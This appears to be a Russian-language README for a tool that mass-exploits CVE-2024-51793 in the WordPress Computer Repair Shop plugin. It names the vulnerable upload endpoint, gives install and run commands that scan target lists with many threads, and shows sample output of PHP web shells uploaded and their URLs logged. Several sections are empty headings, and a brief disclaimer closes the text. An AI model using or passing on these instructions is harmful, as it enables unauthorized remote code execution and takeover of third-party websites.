
Эксплуатирует CVE-2024-51793 — неаутентифицированную произвольную загрузку файлов в плагине WordPress Computer Repair Shop, сканирует списки целей, загружает PHP-веб-шеллы и сообщает об уязвимых сайтах.
📋 Обзор CVE-2024-51793 — это уязвимость неаутентифицированной произвольной загрузки файлов в плагине Computer Repair Shop для WordPress (версии до 3.8116). Эта уязвимость позволяет злоумышленникам загружать произвольные файлы, включая PHP-веб-шеллы, без аутентификации, что приводит к удаленному выполнению кода на уязвимых сайтах WordPress.
🚨 Детали уязвимости CVE ID: CVE-2024-51793
Тип уязвимости: Неаутентифицированная произвольная загрузка файлов
Затронутый плагин: Computer Repair Shop WordPress Plugin
Затронутые версии: < 3.8116
Уровень риска: Критический (Оценка CVSS: 9.8)
🔧 Технические детали Уязвимость существует в обработчике действия wc_upload_file_ajax в плагине, который не выполняет должным образом проверку типов файлов и аутентификацию пользователей, позволяя неаутентифицированным злоумышленникам загружать вредоносные файлы непосредственно на сервер.
📦 Установка и требования Предварительные требования Python 3.6+
Необходимые пакеты: requests
Установка bash
git clone cd cve-2024-51793-exploit
pip install requests
pip install -r requirements.txt 🛠️ Руководство по использованию Базовое использование bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50 Расширенное использование bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose Аргументы командной строки Argument Short Description Default --list -l Путь к файлу с целевыми URL (обязательно) - --threads -t Количество параллельных потоков 50 --output -o Директория для вывода результатов results Формат входного файла Создайте текстовый файл (targets.txt) с одним URL на строку:
text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog 🔍 Как это работает
text /wp-content/plugins/computer-repair-shop/readme.txt 2. Определение версии Он проверяет, что плагин содержит "CRM WordPress Plugin" и версия ниже 3.8116.
text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax 4. Полезная нагрузка веб-шелла Загруженный веб-шелл предоставляет:
📊 Выходные файлы Инструмент создает два основных выходных файла:
vulnerable_targets.txt — список подтвержденных уязвимых URL
webshells.txt — список успешно загруженных URL веб-шеллов
🎯 Пример выполнения bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30
╔══════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2024-51793 Exploit Tool ║
║ Unauthenticated RCE in Computer Repair Shop WP Plugin ║
║ ║
╚══════════════════════════════════════════════════════════════╝
[ INFO ] Загружено 150 уникальных целей [ INFO ] Начинаем сканирование с 30 потоками
[ SCANNING ] Проверка: http://example.com/ [ VULNERABLE ] Цель определена: http://example.com/ [ SUCCESS ] Шелл загружен: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
[ SCANNING ] Проверка: http://testsite.com/ [ NOT VULNERABLE ] Цель: http://testsite.com/
[ COMPLETED ] Сканирование успешно завершено 🛡️ Меры защиты Для владельцев сайтов Немедленные действия:
Профилактические меры:
Для исследователей безопасности
⚠️ Правовые и этические соображения
🔄 Обслуживание Обновления Регулярно проверяйте:
Устранение неполадок Распространенные проблемы и решения:
📞 Поддержка По вопросам и улучшениям:
📚 Ссылки
Отказ от ответственности: Этот инструмент должен использоваться только для законных исследований безопасности и авторизованного тестирования на проникновение. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.